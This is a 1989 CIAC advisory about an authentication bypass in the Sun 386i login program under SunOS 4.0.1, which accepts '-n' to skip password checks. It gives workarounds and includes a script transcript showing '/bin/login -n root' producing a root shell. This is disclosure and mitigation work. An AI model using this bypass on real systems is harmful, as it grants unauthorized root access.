Authentication bypass in Sun 386i machines
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
________________________________________________________________ THE COMPUTER INCIDENT ADVISORY CAPABILITY CIAC ADVISORY NOTICE ________________________________________________________________ COMPUTER SECURITY INFORMATION Authentication bypass in Sun 386i machines The login program supplied by Sun for its 386i machines, version 4.0.1 of Sun OS (SOS), accepts the argument "-n" which bypasses authentication. It was apparently added in order to allow the Sun program "logintool" to do the authentication and have login do the housekeeping. This allows a user who discovers the new argument to the login program to become a root user in several ways. An example of one method is attached. A temporary solution is to disable logintool and patch the binary using the "strings" and "adb"method used last November. Alternatively and more simly, log in a root and issue the command chmod 110 /bin/login Example of login endrun: --------------------------------------------------- Script started on Tue Apr 11 14:16:25 1989 myhost[1] whoami oconnor myhost[2] /bin/login -n root Login incorrect login: onceuponatime No home directory specified in password file! Logging in with home=/ # whoami root # who a i myhost!onceupon ttyp2 Apr 11 14:17 # ^D myhost1[3] ^D script done on Tue Apr 11 14:17:34 1989 --------------------------------------------------- Sun is presently working on a patch. When it is available, CIAC will inform you accordingly. For questions or additional information, please contact Gene Schultz CIAC Team Leader (415) 422-8193 or FTS 532-8193 gschultz%[email protected]